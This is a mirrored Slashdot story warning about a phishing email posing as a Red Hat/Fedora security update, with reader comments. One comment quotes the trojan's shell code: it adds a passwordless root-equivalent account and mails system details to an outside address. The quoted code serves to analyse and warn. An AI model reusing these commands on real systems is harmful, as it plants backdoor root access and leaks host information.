Slashdot Mirror

← Back to Stories (view on slashdot.org)

Beware 'Fedora-Redhat' Fake Security Alert

Posted by timothy on from the don't-get-took dept.

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

6 of 628 comments (clear)

  1. Re:Cry havoc! by sfire · · Score: 1, Redundant

    And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

  2. Re:Use the /. effect for good by sfire · · Score: 0, Redundant

    And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

  3. Here's my analysis by andfarm · · Score: 1, Redundant

    What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    In other words, it'll create a root-equivalent user called 'bash' and mailing some system info to root@addlebrain.com.

    --

    TANSTAAFI: There Ain't No Such Thing As A Free iPod.

  4. look at this in a diffrent way by barebones · · Score: 0, Redundant

    LINUX IS GROWING LINUX IS GROWING but is this just a start of linux bugs or virus etcccc.......

  5. The Obvious tip-off? by dramatools · · Score: 0, Redundant

    Shouldn't users suspect a "patch" from Red Hat (who gave the world RPM) distributed as a tarball? Also, a real Red Hat alert would encourage users to download the update from RHN or a known good Yum repository. If those two holes in the story weren't enough, there's the lack of a case number and the single patch offered for SIX distributions, all of which are end-of-life save for Fedora Core 2. Red Hat now only provides official updates for Red Hat Enterprise Linux, which isn't mentioned in the "alert" at all. The Fedora Project would only provide updates for Fedora Core 2, while RHL 7.3, 9 and FC 1 are now supported by the Fedora Legacy Project. RHL 7.2 and 8.0 are pretty much abandoned, so any fixes for those releases would need to be built by the user. Fedora Core doesn't even ship a 'fileutils' package-- the Fedora version is called 'coreutils' and also includes sh-utils, textutils and the 'stat' command. This kind of phishing scam is unfortunately commonplace, though large financial institutions are the usual covers. This is the first one I've seen pertaining to a Linux distro-- I can only hope most Red Hat/Fedora admins are familiar enough with their distros to see right through this one.

  6. Re:We knew this day would come by Erik+Hollensbe · · Score: 0, Redundant

    Not to mention, I can't think of a rootkit that doesn't hack ps.

    Standard fare for me is to keep a statically compiled ps and lsof available to me off-machine in case anything 'weird' happens. It doesn't solve all problems, but it helps.